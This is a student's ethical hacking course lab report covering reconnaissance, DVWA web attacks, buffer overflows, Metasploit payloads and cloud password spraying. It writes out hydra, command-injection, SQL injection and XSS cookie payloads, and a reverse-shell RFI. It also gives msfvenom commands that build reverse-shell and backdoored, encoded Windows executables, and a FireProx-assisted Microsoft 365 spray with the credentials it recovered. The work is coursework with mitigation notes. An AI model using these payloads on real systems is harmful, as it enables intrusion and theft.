**Ethical Hacking - GDT2Y3 - Sam Valashjardi (h21samva@du.se).**
===
## **Introduction:**
- This markdown documentation will show the process of completing the labs and my project assignment throughout the course.
*"The course begins with a brief description of important concepts needed for ethical hacking, such as operating systems, software, network protocols, network functions, virtualization, cloud computing and how cyber-attacks can be carried out."* [Ethical Hacking](https://www.du.se/en/study-at-du/kurser/course/?code=GDT2Y3).
## **Labs & Project Documentations.**
* **Sam Valashjardi - IT Security & Software Testing :computer: 3rd year at [Dalarna university](https://du.se)**
* **Course Coordinator: Sir Lord Hans Jones :crown:**
* **Labs 1 - 5**
* **Project assignment**
---
# **Lab 1 - Get used to the lab environment (Linux, Kali, tools, etc.).**
## **1.1 Get used to the lab environment (Linux, Kali, tools, etc.)**
### **A)** *In what directory on the Linux computer is USB media storage normally found after it has been automatically mounted?*
- **USB media storage devices are typically automatically mounted in the /media directory.** ![snapshot1.1A](https://hackmd.io/_uploads/B1OCGpDKa.png)
### **B)** *Try to mount a network-share with Samba (SMB/CIFS):*
- **Here is an implementation of my network-share with samba**
![snapshot1.1B](https://hackmd.io/_uploads/Sk_FBpvFT.png)
### **C)** *What super user processes (processes that normally need root uid to be able to execute) are running as default in your Kali?*
- **ps -aux | grep -E '(/sbin/|/usr/sbin/)'**
![snapshot1.1C](https://hackmd.io/_uploads/S1LD86PYp.png)
### **D)** *List all active TCP and UDP ports that are open as default on Kali?*
- **The active UDP & TCP ports**
![snapshot1.1D](https://hackmd.io/_uploads/B1KgD6DKa.png)
---
## **1.2 Kernel params and simple make install of source**
### **A)** *What Linux kernel version is running on your Kali installation?*
- **6.5.0-kali3-amd64**
![snapshot1.2-A](https://hackmd.io/_uploads/ByFluTwFp.png)
### **B)** *What exact CPU is running in your machine? Number of processors (and cores), vendor, model name, stepping, cache size, bogomips etc.?*
- **lscpu**
![snapshot2.1-B](https://hackmd.io/_uploads/SyIr_aDFp.png)
### **C)** *What command or log file can give you information about the boot process during startup?*
- **sudo cat /var/log/boot.log.1**
![snapshot1.2-C](https://hackmd.io/_uploads/SkDIKTvYT.png)
---
## **1.3 Kernel modules**
### **A. 1)** ***What are the three commands to list, load and unload a kernel module?***
- **List** Kernel Modules: **lsmod**
- **Load** a Kernel Module: **modprobe [module_name]**
- **Unload** a Kernel Module: **modprobe -r [module_name]**
### **A. 2)** ***How can one know that the fuse kernel module is activated in the system?***
- **lsmod | grep fuse**
![snapshot3.1-B](https://hackmd.io/_uploads/BkLZPCPK6.png)
### **B. 1)** ***How did you mount and unmount your home directory?***
- First I mounted the directory with the command 'sshfs h21samva@maggie.du.se: ~/remoteHome'
![snapshot3.1-B1](https://hackmd.io/_uploads/BkqE8JuKT.png)
- **For unmounting the directory I used the command 'fusermount -u remoteHome' which removed it.**
### **B. 2)** ***What are the advantages and disadvantages with SSHFS mount?***
- **Advantages:** Easy to use - Security - Flexibility - Cross-Platform Compatibility
- **Disadvantages:** Performance - Dependency on Network Stability - CPU Usage
### **C)** ***Linux Kernel***
- I downloaded the kernel using the guide given in the instructions.
Here is a snapshot of File systems & Processor type and features (forgot to take a snapshot of Processor family).
![snapshot3.1-C-filesys](https://hackmd.io/_uploads/ryefsy_Fp.png)
![snapshot3.1-C-proc](https://hackmd.io/_uploads/ryAvjyuKp.png)
### **D)** ***What commands are usually needed to compile and install a Linux kernel?***
- **Install necessary packages:** Command: 'sudo apt-get install build-essential libncurses-dev bison flex libssl-dev libelf-dev'
- **Get the Kernel Source:** Command: 'sudo apt-get install linux-source'
- **Extract and Prepare the Kernel Source:** Commands: 'tar xvf linux-source-VERSION.tar.xz' followed by 'cd linux-source-VERSION'
- **Configure the Kernel:** Command: 'make menuconfig'
- **Install the Kernel Modules:** Command: 'sudo make modules_install'
- **Install the Kernel:** Command: 'sudo make install'
- **Update GRUB and Reboot:** Command: 'sudo update-grub'
- **Verify the Kernel Version:** Command: 'uname -r'
---
## **1.4 Remote access to Kali with VNC/RDP and SSH**
### **SSH**
### **A. 1)** ***How did you check if the SSH daemon is running?***
- With the command: 'sudo systemctl status ssh'
![4.1 A1](https://hackmd.io/_uploads/r1rzgedtp.png)
### **A. 2)** ***What commands did you use to start up and stop the SSH daemon?***
- **Command for start up:** 'sudo systemctl start ssh'
- **Command for stopping:** 'sudo systemctl stop ssh'
### **Screen**
### **B)** ***How do you create a “screen”, detach from it and at a later time (let's say from another login two weeks later) re-attach to your screen terminal?***
- To start a new screen session, I just simply type **'screen'** in the terminal.
- To detach from the screen session, press **Ctrl-A** followed by **D**.
- To re-attach to a detached screen session, I used the command: **'screen -r'**
- If you have multiple detached sessions, you can list them with **screen -ls** and then re-attach to a specific one using **screen -r [session ID]**.
### **VNC/RDP**
### **C) Voluntary task**
- It was not a simple task, there was some trial and error behind it, but I managed to solve it in the end.
![snapshot-realvnc](https://hackmd.io/_uploads/SyjaNxuFa.png)
- First of all I installed the VNC server. **Command:** 'sudo apt-get install tightvncserver'
- After installing **RealVNC Viewer** on my home PC, I had to port forward the correct ports in **Oracle VM VirtualBox Manager**. **5901** for both guest and host.
![Untitled](https://hackmd.io/_uploads/BJX-LguK6.png)
- Then I connected to the VNC server using **[IP address of Kali machine]:[5901]**.
---
## **1.5 Remote connection with NetCat shells and upload with TFTP**
### **A)** ***What command did you use to start the netcat shell server?***
- **Command:** nc -lvp 5050
- **nc:** is the NetCat command.
- **-l:** tells NetCat to listen for incoming connections.
- **-v:** this makes NetCat operate in verbose mode, providing more details about the connection (optional).
- **-p:** specifies the port on which NetCat will listen.
### **B)** ***What command did you use for the netcat client to connect to the netcat shell server?***
- **nc [server IP] 5050**
## **1.6 Lab feedback**
### **A)** ***Was this a relevant and appropriate lab and what about length etc?***
- This was an excellent introduction lab. I enjoyed it a lot, perfect length and some of the voluntary/optional ones were a challenge and quite fun as well.
### **B)** ***What corrections and/or improvements do you suggest for this lab?***
- I don't have a single one. I just like everything about it. Very good lab.
---
# **Lab 2 - Information gathering and parallel hash/crypto attacks.**
## **2.1 Information gathering using DNS reconnaissance**
### **A)** *What type of information can be gathered with the DMitry tool*
- DMitry (Deepmagic Information Gathering Tool) is a command-line utility in Kali Linux designed for comprehensive information gathering about a host or domain.
![2.1-A](https://hackmd.io/_uploads/S1BDgmY56.png)
### **B.1)**
- First I SSH'd to maggie.du.se and used dig to attempt a zone transfer.
**Command:** dig ns du.se
![2.1-B-1.dig ns](https://hackmd.io/_uploads/HJfyG7t96.png)
- And then to list all the authoritative nameservers for du.se @ns2.du.se I used the
**Command:** dig axfr du.se @ns2.du.se
![2.1-B-1-output ns1&2](https://hackmd.io/_uploads/HJC1QmK56.png)
### **B.2)**
- You can use the nslookup tool from your PC, as I did here on my own website
**Command:** nslookup -type=ns samvalashjardi.com
![2.1-B-2](https://hackmd.io/_uploads/S1ydN7Y5p.png)
### **C.1)**
- **Commands:**
netenum 130.243.32.0/24 > netname-ips.txt
**&**
./bf-dns.pl -r -f netname-ips.txt | grep -v unused
![2.1-C1](https://hackmd.io/_uploads/Hk2i_7Fcp.png)
### **C.2)**
- ***"The reverse DNS brute force procedure is probably intended to be automated by the bf-dns.pl script. It most likely receives an input list of IP addresses (produced by something like netenum) and runs reverse DNS lookups on each, eliminating entries that are irrelevant or unresponsive."*** - Source ChatGPT
### **D)**
- A forward lookup brute-force using the list of hostnames from the cheat file.
![2.1-C](https://hackmd.io/_uploads/ryJX8XYqa.png)
---
## **2.2 Target scanning with Nmap etc.**
### **A)**
- Well, first I got this output from the command with -PN: ***"Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.04 seconds"***. So I can only find **Port: 179/tcp.**
**Command:** nmap -sT -Pn 130.243.36.2
![2.2-A](https://hackmd.io/_uploads/H1NdJVFqa.png)
- All ports are in ignored state.
**Command:** nmap -sT -Pn 130.243.34.185
![2.2-A-185](https://hackmd.io/_uploads/HJ6zTV996.png)
### **B)**
- But with -sS I find **Port: 4001/tcp**
**Command:** nmap -sS 130.243.36.2
![2.2-B](https://hackmd.io/_uploads/rJw_14Kqa.png)
- All ports are in ignored state.
**Command:** nmap -sS 130.243.34.185
![2.2-B-185](https://hackmd.io/_uploads/rkt784K5a.png)
### **C)**
- This took me 26 minutes to scan! And no ports were found.
**Command:**
![2.2-C-2](https://hackmd.io/_uploads/BkZ-sNtca.png)
- All ports are in ignored state.
**Command:**
![2.2-C-185](https://hackmd.io/_uploads/SyZXsVKca.png)
### **D & E)**
- The OS that is running is most probably: **Oracle Virtualbox**
**Command:**
![2.2-D-2](https://hackmd.io/_uploads/r1g6q4tqa.png)
- All ports are in ignored state.
**Command:**
![2.2-D-185](https://hackmd.io/_uploads/HklJo4t56.png)
---
## **2.3 IP Filtering**
### **A)**
- Well I installed and used **Firewalk** script in **Nmap** with the **Command:** ***"$ sudo nmap --script=firewalk --traceroute du.se"*** which gave me the result:
![2.3-A](https://hackmd.io/_uploads/ryygNS9c6.png)
- **Nmap** is one of the most versatile and widely used tools for network exploration and security auditing. For firewall and filter testing, specific Nmap scans like the ACK scan (-sA), Window scan (-sW), or Maimon scan (-sM) can be particularly revealing.
- **Firewalk** is a more specialized tool designed for firewall rule testing. It uses a technique similar to traceroute, incrementing the TTL value to determine at which hop a packet gets dropped or filtered, helping to map out firewall rules.
### **B)**
- The **Nmap** scan with the **firewalk script** and **--traceroute** option against **du.se** has provided some insightful results:
- **Open Ports:** The scan detected that **ports 80 (HTTP) and 443 (HTTPS)** are open on du.se, which is expected for a web server hosting a website accessible via both HTTP and HTTPS protocols.
- **Firewalk Results:** The **firewalk script output** indicates that several TCP ports are blocked at the first hop (10.0.2.2), which could most likely be my local router or a firewall device. The blocked ports listed are in a wide range, including typical service ports like 1 (TCPMUX), 3-4 (unassigned), 6-7 (Echo, Spooler), 9 (Discard), 13 (Daytime), 17 (Quote of the Day), 19-20 (Character Generator and FTP Data), and others. This suggests that there's filtering in place to prevent access to these services from external sources, which is a common security measure.
- **Traceroute:** The traceroute performed using **port 80/tcp** showed two hops from my location to www.du.se, with the first hop likely being my local gateway (given the private IP address 10.0.2.2) and the second hop reaching the target server www.du.se at IP 130.243.57.42. - [Source 1](https://www.google.se/search?q=Nmap+firewalk+script+explanation&sca_esv=76c68a2d4a39925c&sxsrf=ACQVn0_4M_KQvY7F7loGU6VAKMku38Xg8Q%3A1706870428404&ei=nMa8ZZSiGKCewPAPgKaUuA0&udm=&ved=0ahUKEwiU4L_su4yEAxUgDxAIHQATBdcQ4dUDCA8&uact=5&oq=Nmap+firewalk+script+explanation&gs_lp=Egxnd3Mtd2l6LXNlcnAiIE5tYXAgZmlyZXdhbGsgc2NyaXB0IGV4cGxhbmF0aW9uMgoQABhHGNYEGLADMgoQABhHGNYEGLADMgoQABhHGNYEGLADMgoQABhHGNYEGLADMgoQABhHGNYEGLADSIIFUABYAHABeAGQAQCYAQCgAQCqAQC4AQPIAQDiAwQYACBBiAYBkAYF&sclient=gws-wiz-serp) & [Source 2](https://nmap.org/nsedoc/scripts/firewalk.html)
---
## **2.4 Break password hashes with rainbow tables**
### Reporting task
- I started with opening up ophcrack.
- Navigated to https://ophcrack.sourceforge.io/ to download the necessary [tables](https://ophcrack.sourceforge.io/tables.php).
- Tables: XP free small (380MB) - XP free fast (703MB) - Vista free (461MB)
- After downloading and extracting the files I went back to ophcrack and installed the tables.
- Then I loaded in the PWDUMP files and started to crack them.
- I then saved the files to both .txt & .csv, I found 41/46 Pwds.
- Here is the documentation
![2.4-A](https://hackmd.io/_uploads/BJkGCpki6.png)
![2.4-B](https://hackmd.io/_uploads/Sk8fAaysp.png)
![2.4-graph](https://hackmd.io/_uploads/HyyXATysa.png)
---
## **2.5 Find vulnerabilities with vulnerability scanners**
### Reporting task
- I scanned my Home PC and found various vulnerabilities. Some of them got fixed with a quick windows update and some of the other vulnerabilities are port forwarding and my Plex-server ports.
You may have to zoom in in the browser a bit in order to see better.
![2.5-A](https://hackmd.io/_uploads/HJv4yXbi6.png)
![2.5-B](https://hackmd.io/_uploads/r1nVyQboT.png)
![2.5-C](https://hackmd.io/_uploads/SybBy7Zip.png)
- And here I used **Docker Scout** to scan for vulnerabilities on the influxdb image that we used in an earlier course. Scout found 96 vulnerabilities.
![2.5-docker](https://hackmd.io/_uploads/rk5WXXWja.png)
![2.5-docker2](https://hackmd.io/_uploads/B1shXXZiT.png)
---
## **2.7 Lab feedback**
### **A) Was this a relevant and appropriate lab and what about length etc?**
- Yes absolutely. It was a really fun lab to be honest. Enjoyed every task and learned a lot, good length as well.
### **B) What corrections and/or improvements do you suggest for this lab?**
- I have no input. As I said, this was a really fun and good lab, enjoyed it all the way.
---
# **Lab 3 - Web application attacks**
## **3.1 Damn Vulnerable Web Application (DVWA)**
### **A) Brute Force:**
- **Login:** admin **Password:** password
**Command:** hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.56.101/1.1 http-get-form "/1.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect" -V
![3.1-A](https://hackmd.io/_uploads/BJS8eFGsT.png)
### **B) Command Injection:**
- **Command:** 192.168.56.101; cat /etc/passwd
![3.1-B](https://hackmd.io/_uploads/ryGbbtfja.png)
### **C) Cross Site Request Forgery (CSRF):**
- There is a **session** and **Burp Suite** is running.
![3.1-C3tadenna](https://hackmd.io/_uploads/HJwtWKGi6.png)
- I have marked the changed password and after executing it, it changed. So if I send this link to someone with an active session and they execute it, it will change the password to hejsan.
![3.1-C2](https://hackmd.io/_uploads/S1RuzYzo6.png)
### **D) File Inclusion:**
- I have marked the tampering in the URL. There was a lot of different content files to mess around with.
![3.1-D](https://hackmd.io/_uploads/r12o6DXsa.png)
![3.1-D2](https://hackmd.io/_uploads/ryW2TDQi6.png)
![3.1-D3](https://hackmd.io/_uploads/HJr36w7o6.png)
### **E) File Upload:**
- So I created a PHP file (code in the picture), uploaded the file and removed the '#' at the end of the URL.
![3.1-E](https://hackmd.io/_uploads/SJxurwXoa.png)
### **F) SQL Injection:**
- Following the guide and used the **Command:** 1 or ' union select user, password from users # to execute the **SQL injection**. It presented me with the usernames and hashed passwords.
![3.1-F](https://hackmd.io/_uploads/SkwOBPmsT.png)
### **G) XSS (DOM):**
- We see that the site is vulnerable to **XSS**.
We can manually change the param to 'Jiberich'
![3.1-G2](https://hackmd.io/_uploads/rydYtvmip.png)
- We get the cookie with the script **“<script>alert(document.cookie)</script>”**
![3.1-G](https://hackmd.io/_uploads/SJJFjwXoa.png)
### **H) XSS (Reflected):**
- We use the same approach as before to get the session ID and obtain the cookie.
![3.1-H](https://hackmd.io/_uploads/Sy2Kb_Qip.png)
### **I) XSS (Stored):**
- Proof of concept
![3.1-i](https://hackmd.io/_uploads/Hy4_PO7oT.png)
- We implement the script that is seen in the picture in order to get the cookie and session ID
![3.1-i2](https://hackmd.io/_uploads/ryfz_u7jp.png)
---
## **3.2 Web Application Attacks**
### **A) SQL Injection**
#### **Show the SQL you used.**
- I used the **SQL statement 1' or'1'='1** and found that the password field is vulnerable to injection.
![3.2-A1](https://hackmd.io/_uploads/BkA4NK7oT.png)
### **B) LFI (Local File Inclusion)**
#### **Show the code you used to execute the attack.**
- First I turned on **Intercept** in Burp Suite, next I submitted a "change language" and got the **request** shown in the picture.
I modified the **selectLang=** and inserted **file:///etc/passwd** and got the **response**.
(you might have to zoom in a bit to see the text)
![3.2-B1](https://hackmd.io/_uploads/SJPX-IDjT.png)
### **C) RFI (Remote File Inclusion)**
#### **1) Show that you can send code to the attacked web server and thus create and access a reverse shell:**
- I used the built-in **php-reverse-shell.php** in Kali to create and access the reverse shell. Then with **Burp Suite's Repeater** I sent the PHP to the server as shown below.
![3.2-C1](https://hackmd.io/_uploads/rylZHh_jT.png)
- After navigating and locating the password of user **bobby**, I SSH'd to the server and logged in with the password **strongpass**.
- Afterwards I changed the password and gained root access.
![3.2-C3](https://hackmd.io/_uploads/rkepB2Oo6.png)
- Located shadow.
![3.2-C2](https://hackmd.io/_uploads/HJ_xInuoT.png)
- I have now full access to the server.
### **D) With a brief report, describe the vulnerabilities and what’s needed to prevent them.**
**SQL Injection** is a vulnerability that allows attackers to execute arbitrary SQL code on a database through the web application. This can lead to unauthorized access to sensitive data, data manipulation, and even complete database compromise.
**Mitigation:**
- Use of Prepared Statements and Parameterized Queries: These constructs ensure that SQL commands inserted by an attacker cannot alter the query's structure.
- Implementation of Stored Procedures: Properly used stored procedures can reduce the surface area for SQL injection attacks by separating data from commands.
- Input Validation: Rigorously validate all user inputs to ensure they conform to the expected format, thereby preventing malicious data from being processed.
- Adherence to the Principle of Least Privilege: Limit database permissions for the application to only what is necessary for its operation.
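To make the first mitigation concrete, here is an added example (my own code, not DVWA's PHP or anything from the lab) that puts the concatenated query from task 3.2 A next to its parameterized form. It assumes an in-memory SQLite database with a constructed `users` table and two placeholder rows; the password column holds constructed strings only, since password hashing is a separate topic.

```python
import sqlite3

# Constructed sample rows, not DVWA's real users table (the password column
# holds placeholder strings; a real application stores and compares hashes).
SAMPLE_USERS = [
    ("admin", "constructed-secret-1"),
    ("bobby", "constructed-secret-2"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, user, password):
    """The defect behind task 3.2 A: the statement is assembled by string
    concatenation, so a quote in the input changes the query's structure."""
    sql = ("SELECT user FROM users WHERE user = '" + user
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, user, password):
    """Prepared statement with placeholders: the driver passes the values to the
    engine separately from the SQL text, so they are never parsed as SQL."""
    sql = "SELECT user FROM users WHERE user = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (user, password))]


if __name__ == "__main__":
    db = make_db()
    payload = "1' or'1'='1"        # the password-field payload used in the lab
    print("vulnerable   :", login_vulnerable(db, "admin", payload))
    print("parameterized:", login_parameterized(db, "admin", payload))
```

With the lab's payload in the password field, the concatenated query becomes `... AND password = '1' or'1'='1'`, the `OR` is true for every row and both users come back; the parameterized query compares the literal string `1' or'1'='1` against the column and returns nothing.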
**Local File Inclusion (LFI)** vulnerabilities allow attackers to read or execute files on the server that should not be accessible through the web application. This could lead to information disclosure, local code execution, and server compromise.
**Mitigation:**
- Input Validation and Sanitization: Ensure all user inputs are validated against a strict set of rules that exclude file system navigation characters.
- Use of Whitelisting: Only allow inclusion of files that have been explicitly deemed safe, rather than trying to block known dangerous inputs.
- Disable Unnecessary Features: Turn off PHP directives like allow_url_include and functions that facilitate file inclusion if they are not needed.
**Remote File Inclusion (RFI)** vulnerabilities occur when web applications allow the inclusion of remote files or scripts. Attackers can exploit this to execute malicious code on the server, leading to unauthorized access, data breach, and server control.
**Mitigation:**
- Disable Remote Inclusions: Set PHP configuration options such as allow_url_fopen and allow_url_include to false to prevent the inclusion of remote files.
- Strict Input Validation: Adopt rigorous input validation techniques to ensure only intended files can be included, and prevent the use of URLs or remote paths.
- Employ Security-Focused Libraries: Use libraries and frameworks that are less susceptible to RFI, leveraging their security mechanisms to protect against such vulnerabilities.
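The LFI and RFI mitigations above both come down to the same rule: the user picks a key, never a path. The following added example (my own code, not the lab server's) shows an allow-list resolver for a `selectLang`-style parameter like the one tampered with in task 3.2 B; it also labels why a value was refused, which is what you would want to log. The language directory `/var/www/app/lang` and the key set are assumptions.

```python
from pathlib import PurePosixPath
from urllib.parse import urlsplit

# Hypothetical layout: language files live in LANG_DIR and are chosen by key.
LANG_DIR = PurePosixPath("/var/www/app/lang")
ALLOWED_LANGS = {"en", "sv", "de"}          # constructed allow-list of keys
REMOTE_SCHEMES = {"http", "https", "ftp"}


def classify_include(value):
    """Classify a selectLang-style value; only "ok" may ever reach include()."""
    scheme = urlsplit(value).scheme.lower()
    if scheme in REMOTE_SCHEMES:
        return "remote-url"        # RFI attempt (allow_url_include territory)
    if scheme:
        return "stream-wrapper"    # file://, php://, data://, expect:// ...
    parts = PurePosixPath(value).parts
    if value.startswith("/") or ".." in parts:
        return "path-traversal"    # LFI via absolute path or ../ escapes
    if value not in ALLOWED_LANGS:
        return "not-allow-listed"  # unknown key: refuse, do not deny-list
    return "ok"


def resolve_language_file(value):
    """Return (path, "ok") for an allowed key, or (None, reason) otherwise."""
    verdict = classify_include(value)
    if verdict != "ok":
        return None, verdict
    # The path is built from the key alone; no user-supplied fragment is used.
    return LANG_DIR / f"{value}.php", verdict


if __name__ == "__main__":
    for value in ("en", "file:///etc/passwd", "../../etc/passwd",
                  "http://203.0.113.10/shell.txt", "fr"):
        print(repr(value), "->", resolve_language_file(value))
```

The allow-list check alone already rejects every non-key value; the earlier branches only exist to give the refusal a descriptive reason for logging and detection. The path checks are POSIX-only; a Windows host would also have to treat backslashes as separators.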
### **E) Finally, submit the users that you find on the server as well as their passwords in plain text.**
![3.2-C4](https://hackmd.io/_uploads/r1txo3uoT.png)
---
## **3.3 Lab feedback**
### **A) Was this a relevant and appropriate lab and what about length etc?**
- Yes, it was a very relevant lab and a lot of fun as well. I learned a lot of new stuff and gained valuable knowledge and experience. I wish there would be more content like this in our education.
### **B) What corrections and/or improvements do you suggest for this lab?**
- None that really comes to mind.
---
# **Lab 4 - Buffer-overflow attacks and exploit frameworks.**
## **4.1 Buffer exploits (bad programming)**
### **4.1.1 Theoretical question**
**Report - Theoretical introduction question.
According to the article “Secure programmer: Countering buffer overflows Preventing today's top vulnerability” above, what are the common problems with C/C++ which allow buffer overflows?**
- Using unsafe functions such as gets(), strcpy(), strcat(), scanf(), and printf() called with user input as the format string. These functions do not check the size of the input or output buffers and can write past their boundaries, overwriting adjacent memory locations.
- Not validating user input before processing it. User input can contain malicious data that is designed to exploit buffer overflow vulnerabilities, such as long strings, escape sequences, or shellcode.
- Making incorrect assumptions about memory layout. Some programmers may assume that the stack grows upward, that variables are aligned in a certain way, or that the compiler does not insert padding or rearrange variables. These assumptions can lead to errors when calculating buffer sizes or offsets, resulting in buffer overflows.
Some quotes from the article:
- ***"The same buffer that was used to overwrite the return address can also be used to hold a short snippet of executable code, called shellcode, that will in turn download a malicious executable, or open up a network connection, or do whatever else the attacker fancies."***
- ***"The return address controls which instructions the processor will execute when it's finished with the current function; it's meant to be some location within the calling function, but if it gets overwritten in a buffer overflow, it could point anywhere."***
### **4.1.2 Gnu/Linux Tasks.**
**Report:**
- Compiled with 'gcc -o stack_one stack_one.c'. The target value is 0x496c5962, written byte-reversed (little-endian) after 64 bytes of padding:
`./stack_one $(python -c 'print("A" * 64 + "\x62\x59\x6c\x49")')`
![4.1.2](https://hackmd.io/_uploads/BJUpp85sT.png)
### **4.1.3 Windows Task.**
**A):**
- I found two different inputs that gave a successful attack:
**Command:** **admin a** & **admin huhtgertgf**
The second one is an exact string of 16 chars which overflows the buffer.
![4.1.3 Windows Task](https://hackmd.io/_uploads/BJQUxq4hT.png)
**B):**
- Using **"snprintf"** instead of **"sprintf"** means the buffer length gets checked and access gets denied.
![snprintf](https://hackmd.io/_uploads/rybHe9Eha.png)
## **4.2 Exploit frameworks – client side exploits**
### **4.2.1 Executable payload creation.**
**A) Create a reverse TCP connect Windows PE file:**
- **Command:** sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.182.136 LPORT=31337 -f exe | sudo tee /root/msf_shell_rev_tcp1.exe > /dev/null
- **Command:** sudo mv /root/msf_shell_rev_tcp1.exe ~/msf_shell_rev_tcp1.exe
![tcp1](https://hackmd.io/_uploads/HkfyM54hT.png)
**B) Create a reverse tcp connect staged Windows PE file:**
- **Command:** sudo msfvenom -p windows/shell/reverse_tcp LHOST=192.168.182.136 LPORT=31337 -f exe | sudo tee /root/msf_shell.rev_tcp2.exe > /dev/null
- **Command:** sudo mv /root/msf_shell.rev_tcp2.exe ~/msf_shell.rev_tcp2.exe
![4.2.1 tcp2](https://hackmd.io/_uploads/Syzlz5N2a.png)
**C) What is the difference between the two payloads ”windows shell_reverse_tcp” and ”windows/shell/reverse_tcp”?**
- **Tcp1** No Encoding. Score 57. Simple reverse TCP.
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.182.136 LPORT=31337 -f exe | sudo tee /root/msf_shell_rev_tcp1.exe > /dev/null
- **Tcp2** Encoding. Score 58. Simple reverse TCP. Difference: / instead of _
sudo msfvenom -p windows/shell/reverse_tcp LHOST=192.168.182.136 LPORT=31337 -f exe | sudo tee /root/msf_shell.rev_tcp2.exe > /dev/null
- **241 bytes difference. Yandex detects tcp1 but not tcp2.**
![4.2.1-CompareC](https://hackmd.io/_uploads/B1wWz5E3T.png)
**D) Create an encoded and injected meterpreter reverse tcp connect Windows PE file.**
- **Downloaded** tftpd32.exe from
https://bitbucket.org/phjounin/tftpd64/downloads/Tftpd32-4.60-setup.exe
![tpft](https://hackmd.io/_uploads/rJubQcEnp.png)
- **Command:** msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.182.136 LPORT=31337 -f exe -k -e x86/shikata_ga_nai -i 3 -x ~/Desktop/tftpd32.exe -o ~/Desktop/tftpd32_bdoor.exe
![bdor](https://hackmd.io/_uploads/HkW1v5Ehp.png)
![tftp32](https://hackmd.io/_uploads/ByxQX9N3T.png)
**E) Explain the following 11 payload options (modules) for Meterpreter in short?**
- **Command Compromised behavior.**
windows/meterpreter/bind_ipv6_tcp **-** Acts as a server. Binds to TCP. IPv6 Communication.
windows/meterpreter/bind_nonx_tcp **-** Acts as a server. Binds to TCP. NX Disabled.
windows/meterpreter/bind_tcp **-** Acts as a server. Binds to TCP.
windows/meterpreter/find_tag **-** Finding tag in Meterpreter Payloads.
windows/meterpreter/reverse_ipv6_tcp **-** Acts as a client. Creates reverse IPv6 TCP connection.
windows/meterpreter/reverse_nonx_tcp **-** Acts as a client. Reverse TCP without payload
windows/meterpreter/reverse_ord_tcp **-** Acts as a client. Reverse TCP with payload.
windows/meterpreter/reverse_tcp **-** Acts as a client. Reverse TCP
windows/meterpreter/reverse_tcp_allports **-** Acts as a client. Reverse TCP multiple ports connect back
windows/metsvc_bind_tcp **-** Acts as a Windows service. Bind TCP. Meterpreter on tar
windows/patchupmeterpreter/bind_tcp **-** Binds TCP.
- **Meterpreter connections:**
Extensible Payload, that provides a [Command Channel] & [Control Channel] during exploitation.
**Purpose:** Execute commands on the compromised system. Example: Exfiltrating data.
Exfiltrating data: Stolen data, Login credentials, Financial information.
### **4.2.2 Connect to the exploit and PDF exploits**
**Report: Now upload this “msf.pdf” file to VirusTotal and paste the result to your report as you have done previously.**
- The result from uploading **msf.pdf** to **Virustotal.com**.
![msf](https://hackmd.io/_uploads/BJsHVhN2T.png)
### **4.2.3 Manage sessions (a meterpreter session is needed)**
**Report: Show a screen dump of one successful shell and meterpreter exploit you have performed.**
- After installing a VM for **Windows 7** and installing **lab4-AdbeRdr930_en_US**, I uploaded the **msf.pdf** file that we created in **metasploit**. I opened the PDF and got a session going. I uploaded a file as proof as well.
![4.2.2](https://hackmd.io/_uploads/S14tv043a.png)
![4.2.2-upload](https://hackmd.io/_uploads/BysYD0Nha.png)
## **4.3 A simple stack based 64-bit buffer overflow/overrun exploit**
**Report: Show with a screen dump that you successfully could create a reverse shell via Metasploit against a 64-bit program according to the given instructions in the task.**
- Completed the assignment in a code along session with Hans Jones.
![4.3](https://hackmd.io/_uploads/ryKMPB5oT.png)
## **4.6 Lab feedback**
### **A) Were the labs relevant and appropriate and what about length etc?**
- I have learned a lot in this lab. It was really fun, but the hardest lab of them all in this course. Good length as well, it was fun doing the code-along with Hans. I liked "4.2.2 Connect to the exploit and PDF exploits" a lot.
### **B) What corrections and/or improvements do you suggest for these labs?**
- Windows task was a bit of a pain in the ass to get to work and understand correctly at first, but we figured it out after.
---
# **Lab 5 - Cloud, network attacks and reverse engineering.**
## **5.1.1 Cloud Scanning**
### **Tasks, questions to answer and report:**
### **A) Calculate how many potential IPv4 addresses that potentially can be scanned in a region for your data center provider of choice somewhere in Europe.**
- **Command:** python3 countips.py eu-north-1-range.txt
**Result:** 1342092
![5.1.1-A](https://hackmd.io/_uploads/HyIp0TY3a.png)
### **B) Scan a private RFC-1918 (as 10.0.0.0/16, 172.16.0.0/16 or 192.168.0.0/16) cloud or real/16 network with masscan for some ports that use TLS.**
- Scanned the 192.168.0.0 & 10.0.0.0 IPs
![5.1.1-B](https://hackmd.io/_uploads/SJgCZ0KnT.png)
## **5.1.2 Cloud Bucket Discovery**
### **Tasks, questions to answer and report:**
### **A) Can you find a bucket discovery tool for Oracle Cloud Infrastructure (OCI)?**
- Yes I found my public bucket, but could not find my private.
![5.1.2-A](https://hackmd.io/_uploads/H1oELAFhp.png)
### **B) Is it possible to tell the difference between if a bucket exists and is private OR if the bucket does not exist at all?**
- With the **"Error 404"** response for the **private bucket**, it is currently difficult to distinguish between a private bucket and one that doesn't exist based only on this response.
To clarify this distinction, more techniques or OCI-specific error handling may be needed.
## **5.2.1 Microsoft 365 Password Attacks**
### **Questions to answer and report:**
### **A) Find all users from the 400 username list with passwords you could recover and report it.**
- So the **Users & passwords** that I found was:
SUCCESS! john.merckle@falsimentis.com : Password123
SUCCESS! heather.allen@falsimentis.com : Lakers2020 (MFA is in use)
SUCCESS! bari.kembrey@falsimentis.com : Summer2022
![5.2.1](https://hackmd.io/_uploads/HkryrrRjp.png)
- After these 2 searches my sprays started to get locked out, even though I had a **FireProx URL** active in the URL.
![5.2.1 - B](https://hackmd.io/_uploads/rkjyBBCjp.png)
So I had to restart **FireProx URL** again and keep searching.
### **B) If a user have MFA enabled for his/her MS 365 account, how could we potentially bypass this protection?**
